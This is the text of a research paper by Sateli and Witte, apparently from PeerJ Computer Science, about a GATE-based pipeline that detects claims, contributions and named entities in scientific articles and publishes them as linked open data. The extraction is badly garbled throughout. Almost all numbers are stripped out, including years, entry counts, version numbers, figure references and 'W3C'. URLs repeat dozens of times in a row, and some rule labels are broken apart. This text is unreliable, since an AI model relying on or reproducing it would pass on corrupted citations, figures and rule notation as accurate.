http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://dx.doi.org/ . /peerj-cs. a well-known tool for linked ne detection is dbpedia spotlight (mendes et al., ; daiber et al., ), which automatically annotates text with dbpedia resource uris. it compares surface forms of word tokens in a text to their mentions in the dbpedia ontology. after disambiguating the sense of a word, the tool creates a link to its corresponding concept in dbpedia. aida (yosef et al., ) is an online tool that extracts and disambiguates nes in a given text by calculating the prominence (frequency) and similarity of a mention to its related resources on the dbpedia, freebase (https://www.freebase.com) and yago (http://www. mpi-inf.mpg.de/yago-naga/yago) ontologies. usbeck et al. ( ) introduced agdistis, a graph-based method that is independent of the underlying lod source and can be applied to different languages. in their evaluation, it outperformed other existing tools on several datasets. more recently, bontcheva et al. ( ) conducted a user study on how semantic enrichment of scientific articles can facilitate information discovery. they developed a text mining pipeline based on gate that can process articles from the environmental science domain and link the entities in the documents to their dbpedia uri. their goal, however, was to enrich the documents with additional metadata, such as geographical metadata, for a semantic search web service and automatically assigning a subject field to the documents from the dublin core (weibel et al., ) ontology. summary in our work, we follow an approach similar to teufel’s in that we use nlp techniques for recognizing res in scientific documents. however, rather than looking at documents in isolation, we aim at creating a linked data knowledge base from the documents, described with common semantic web vocabularies and interlinked with other lod sources, such as dbpedia. we are not aware of existing work that combines nlp methods for re detection with semantic web vocabularies in a fully-automated manner, especially in the computer science domain. entity linking is a highly active research area in the semantic web community. however, it is typically applied on general, open domain content, such as news articles or blog posts, and none of the existing datasets used for evaluation contained scientific publications. to the best of our knowledge, our work is among the first to investigate the application of entity linking on scientific documents’ lod entities combined with rhetorical entities. design in this section, we provide a step-by-step description of our approach towards a semantic representation of scientific literature. in our system, illustrated in fig. , an automatic workflow accepts scientific literature (e.g., a journal article) as input, and processes the full-text of the document to detect various syntactic and semantic entities, such as bibliographical metadata and rhetorical entities (section ‘automatic detection of rhetorical entities’). in addition, our approach uses ner tools to detect the topics mentioned in the document content and link them to resources on the lod cloud (section ‘automatic detection of named entities’). finally, the extracted information is stored in a semantic sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com https://www.freebase.com http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://www.mpi-inf.mpg.de/yago-naga/yago http://dx.doi.org/ . /peerj-cs. figure a high-level overview of our workflow design, where a document is fed into an nlp pipeline that performs semantic analysis on its content and stores the extracted entities in a knowledge base, inter-linked with resources on the lod cloud. knowledge base (section ‘semantic representation of entities’), which can then be queried by humans and machines alike for their tasks. automatic detection of rhetorical entities we designed a text mining pipeline to automatically detect rhetorical entities in scientific literature, currently limited to claims and contributions. in our classification, contributions are statements in a document that describe new scientific achievements attributed to its authors, such as introducing a new methodology. claims, on the other hand, are statements by the authors that provide declarations on their contributions, such as claiming novelty or comparisons with other related works. our re detection pipeline extracts such statements on a sentential level, meaning that we look at individual sentences to classify them into one of three categories: claim, contribution, or neither. if a chunk of text (e.g., a paragraph or section) describes a claim or contribution, it will be extracted as multiple, separate sentences. in our approach, we classify a document’s sentences based on the existence of several discourse elements sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and so-called trigger words. we adopted a rule-based approach, in which several rules are applied sequentially on a given sentence to match against its contained lexical and discourse elements. when a match is found, the rule then assigns a type, in form of a lod uri, to the sentence under study. text pre-processing as a prerequisite to the semantic analysis step, we pre-process a document’s text to covert it to a well-defined sequence of linguistically-meaningful units: words, numbers, symbols and sentences, which are passed along to the subsequent processing stages (sateli & witte, ). as part of this process, the document’s text is broken into tokens and lemmatized. tokens are smallest, meaningful units of text, such as words, numbers or symbols. lemmatization is the process of finding the canonical form (lemma) of each word: e.g., “run,” “running” and “ran” all have the same root form (“run”). a part-of-speech (pos) tagger then assigns a pos feature to each word token, such as noun, verb or adjective. afterwards, determiners, adjectives and nouns are processed by a noun phrase (np) chunker component, which groups them into np annotations. gazetteering starting the semantic analysis phase, we perform gazetteering on the pre-processed text. essentially, gazetteers are lists of known entities (words and phrases) that can be directly matched against the text. if a match is found, the word is tagged with its pre-defined type and later used in the rule-matching process. we manually curated multiple gazetteer lists that contain our trigger words. for example, we have gathered a list of general terms used in computer science ( entries), such as “framework” and “approach,” as well as a comprehensive list of verbs used in the scientific argumentation context ( entries), like “propose” and “develop,” categorized by their rhetorical functions in a text. we curated these gazetteer lists from manual inspection of the domain’s literature and teufel’s az corpus (argumentation zoning (az) corpus, http://www.cl.cam.ac.uk/∼sht /az corpus.html) for rhetorical entities. in order to eliminate orthographical variations of words (e.g., plural vs. singular, past tense vs. present) the gazetteering is performed on the lemmatized text. this approach also dramatically reduces the size of the gazetteer lists, since they only need to keep the canonical form of each entry for matching against the text tokens. metadiscourse phrases detection of a rhetorical entity is performed in incremental steps: first, we detect metadiscourse elements in text, i.e., sentences where the authors describe what is being presented in the paper. then, we classify each sentence under study based on a set of lexical and grammatical clues in the text. metadiscourse entities often contain a discourse deixis. deictic phrases are expressions within an utterance that refer to parts of the discourse. for example, the word “here” in “here, we describe a new methodology. . . ” refers to the article that the user is reading. in scientific literature, deictic phrases are often used in metadiscourse phrases, such as the following examples that look for a sequence of token categories (e.g., determiner) and entries from our gazetteer (deixes are in bold): sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://dx.doi.org/ . /peerj-cs. ruledeictic : d + n pgazetteer ( ) “this paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica paper ) ru l edeictic : a + p ( ) “here, we demonstrate how our interpretation of nps, named graphs, knowledge resources. . . ”(sepublica paper ) based on the detected deictic phrases, we annotate metadiscourse phrases in a sentence, like the following examples that are based on verbs from our gazetteer of rhetorical verbs: ru l emetadiscourse : d p + vpresentation ( ) “this paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica paper ) ru l emetadiscourse : d p + p + vpresentation ( ) “here, we demonstrate how our interpretation of nps, named graphs, knowledge resources. . . ”(sepublica paper ) contributions we designed hand-crafted rules to extract contribution sentences by finding grammatical structures often observed in scientific argumentation to describe authors’ contributions. the rules look at sequences of deictic phrases, metadiscourse mentions, the rhetorical function of the verbs mentioned in the sentence and the adjacent noun phrases to classify a sentence as a contribution, like the following example (matching string is in bold): ru l econtribution : m + n p ( ) “this paper presents a use case of adding value to a bird observation dataset by related weather data. . . ”(sepublica paper ) ru l econtribution : m + a + n p ( ) “here, we demonstrate how our interpretation of nps, named graphs, knowledge resources. . . ”(sepublica paper ) claims the extraction of claim entities is done similar to the contribution annotations and performed based on deictic phrases detected in a text. however, here we require that the deictic phrases in claim sentences explicitly refer to the authors’ contributions presented in the paper. hence, we distinguish claims from other classes in the way that the sentence containing the deictic phrase must (i) be a statement in form of a factual implication, and (ii) have a comparative voice or asserts a property of the author’s contribution, like novelty or performance: sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. ru l eclaim : m + d + a + d c t ( ) “we built the first baudenkmalnetz prototype using smw [dlk+ ].”(sepublica paper ) ru l eclaim : d p + v + d c t ( ) “our approach is compatible with the principles of nanopublications.”(sepublica paper ) automatic detection of named entities using the rules described above, we can now find and classify res in a scientific document. however, by using res alone, a system is still not able to understand the topics being discussed in a document; for example, to generate a topic-focused summary. therefore, the next step towards constructing a knowledge base of scientific literature is detecting the named entities that appear in a document. our hypothesis here is that the extraction of named entities provides the means to represent the main topics being discussed in a paper. therefore, the detection of the presence of such entities, along with linguistic constituents of the re fragments, will help towards understanding the meaning of an article’s content and position of its authors regarding the detected entities, e.g., ‘enhancing algorithm a’ or ‘applying method m.’ since the recognition of nes varies by the functions of the field (e.g., biological terms vs. software methodologies), in lieu of developing multiple, domain-specific ner tools, we intend to reuse the lod cloud as a structured, continually updated source of structured knowledge, by linking the surface forms of terms in a document to their corresponding resources in the lod cloud. to further test this hypothesis, we selected the dbpedia spotlight annotation tool described in section ‘named entity linking’ to automate the entity recognition task. our goal here is to annotate the full-text of a document and then map the detected entities to the original document using the text offsets provided by spotlight. since we are solely interested in the named entities, we will discard any tagged entity that does not fall within a noun phrase chunk. this way, adverbs or adjectives like “here” or “successful” are filtered out and phrases like “service-oriented architecture” can be extracted as a single entity. semantic representation of entities in order to transform the detected rhetorical and named entities into an interoperable and machine-understandable data structure that can be added to a semantic knowledge base, we chose to represent the extracted entities described above, as well as other metadata about each document, using the w c standard rdf format. therefore, each document will become a subject of a triple and all the detected entities will be attached to the document instance using custom predicates. each entity may itself be the subject of other triples describing its semantic types and other properties, hence, creating a flexible, scalable graph of the knowledge mined from the document. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table vocabularies used in our semantic model. the table shows the list of shared linked open vocabularies that we use to model the detected entities from scientific literature, as well as their inter- relationships. prefix vocabulary uri pubo publication ontology <http://lod.semanticsoftware.info/pubo/pubo#> doco document components ontology <http://purl.org/spar/doco> sro salt rhetorical ontology <http://salt.semanticauthoring.org/ontologies/sro#> rdf w c rdf <http://www.w .org/ / / -rdf-syntax-ns#> rdfs w c rdf schema <http://www.w .org/ / /rdf-schema#> cnt w c content ontology <http://www.w .org/ /content#> dbpedia dbpedia ontology <http://dbpedia.org/resource/> vocabularies as discussed in section ‘document markup vocabularies’, we try to reuse the existing linked open vocabularies for modeling the documents and the extracted knowledge, following the best practices for producing linked open datasets (best practices for pub- lishing linked data, http://www.w .org/tr/ld-bp/). therefore, we developed a vocabulary for scientific literature constructs partly by using existing shared vocabularies (table ). we chose to reuse the doco vocabulary for the semantic description of a document’s structure, since it covers both structural and rhetorical entities of a document through integrating the deo (discourse elements ontology, http://purl.org/spar/deo) and salt rhetorical ontologies. therefore, by using doco, we can describe both the structure of documents (e.g., abstract, title), as well as various res types (e.g., contributions). we also developed our own vocabulary to describe the relations between a doc- ument and its contained entities. our publication ontology (publication ontology (pubo), http://lod.semanticsoftware.info/pubo/pubo.rdf) uses “pubo” as its namespace throughout this paper, and models res as the subset of document’s sentences with a specific type, which may in turn contain a list of topics, i.e., named entities with uris linked to their lod resources. figure shows example rdf triples using our publication model and other shared semantic web vocabularies. the most similar vocabulary to our pubo vocabulary would have been the open annotation (oa) format, where each detected entity is described with a body and a open annotation model, http://www. w .org/ns/oa target element. the former would create a uri representing the annotation (and some provenance information) and the latter provides information like the source document url and text offsets. the generated body and target instances are then connected together using custom oa predicates. using the oa data model, however, would lead to a ‘triple bloat’ situation, increasing the size of knowledge base by a factor of – . moreover, the triple bloat refers to a situation where multiple triples are required to convey one fact. oa data model lacks an explicit representation of embedded annotations, such as the description of named entities contained within a rhetorical entity, which would require more complex and time-consuming queries to extract these facts from a knowledge base. the entity export process while the type of the extracted entities are decided by the rules described in ‘automatic detection of rhetorical entities’, ideally, we still would like to have the flexibility to express sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://www.w .org/tr/ld-bp/ http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://purl.org/spar/deo http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://lod.semanticsoftware.info/pubo/pubo.rdf http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://www.w .org/ns/oa http://dx.doi.org/ . /peerj-cs. figure the figure shows the sequence of processing resources of our text mining pipeline that runs on a document’s text, producing various annotations, which are finally exported into a knowledge base. the mapping of annotations to rdf triples and their inter-relations at runtime. this way, various representations of knowledge extracted from documents can be constructed based on the intended use case and customized without affecting the underlying syntactic and semantic processing components. we designed an lod exporter component that transforms annotations in a document to rdf triples. the transformation is conducted according to a series of mapping rules. the mapping rules describe (i) the annotation type in the document and its corresponding semantic type, (ii) the annotation’s features and their corresponding semantic type, and (iii) the relations between exported triples and the type of their relation. given the mapping rules, the exporter component then iterates over a document’s entities and exports each designated annotation as the subject of a triple, with a custom predicate and its attributes, such as its features, as the object. table summarizes the shared vocabularies that we use in the annotation export process. implementation we implemented the nlp pipeline described in the ‘design’ section based on the general architecture for text engineering (gate) (cunningham et al., ), a robust, gate, http://gate.ac.uk open-source framework for developing language engineering applications. our pipeline is composed of several processing resources (prs) that run sequentially on a given document, as shown in fig. . each processing resource can generate a new annotation or add a new feature to the annotations from upstream processing resources. in this section, we provide the implementation details of each of our pipeline’s components. note that the materials described in this section can be found at http://www.semanticsoftware.info/ semantic-scientific-literature-peerj- -supplements. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://gate.ac.uk http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://dx.doi.org/ . /peerj-cs. pre-processing the input documents we use gate’s annie plugin (cunningham et al., ), which offers readily available pre-processing resources to break down a document’s text into smaller units adequate for the pattern-matching rules. specifically, we use the following processing resources provided by gate’s annie and tools plugins: document reset pr removes any existing annotations (e.g., from previous runs of the pipeline) from a document; annie english tokeniser breaks the stream of a document’s text into tokens, classified as words, numbers or symbols; regex sentence splitter uses regular expressions to detect the boundary of sentences in a document; annie pos tagger adds a pos tag to each token as a new feature; and gate morphological analyser adds the root form of each token as a new feature. the pre-processed text is then passed onto the downstream processing resources. rhetector: automatic detection of rhetorical entities we developed rhetector (http://www.semanticsoftware.info/rhetector) as a stand-alone gate plugin to extract rhetorical entities from scientific literature. rhetector has several processing resources: (i) the rhetorical entity gazetteer pr that produces lookup annotations by comparing the text tokens against its dictionary lists (domain concepts, rhetorical verbs, etc.) with the help of the flexible gazetteer, which looks at the root form of each token; and (ii) the rhetorical entity transducer, which applies the rules described in section ‘automatic detection of rhetorical entities’ to sequences of tokens and their lookup annotations to detect rhetorical entities. the rules are implemented using gate’s jape (cunningham et al., ) language that provides regular expressions over document annotations, by internally compiling the rules into finite-state transducers. every jape rule has a left-hand side that defines a pattern, which is matched against the text, and produces the annotation type declared on the right-hand side. additional information are stored as features of annotations. a sequence of jape rules for extracting a contribution sentence containing a metadiscourse is shown in fig. . lodtagger: named entity detection and grounding using dbpedia spotlight we locally installed the dbpedia spotlight (http://spotlight.dbpedia.org) tool (daiber et al., ) version . and used its restful annotation service to find and disambiguate with a statistical model for english (en + ), http://spotlight.sztaki.hu/ downloads/ named entities in our documents. to integrate the ne detection process in our semantic analysis workflow, we implemented lodtagger (http://www.semanticsoftware.info/ lodtagger), a gate plugin that acts as a wrapper for the spotlight tool. the dbpediatagger pr sends the full text of the document to spotlight as an http post request and receives an array of json objects as the result, like the example shown in fig. . the dbpediatagger pr then parses each json object and adds a dbpedialink sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector 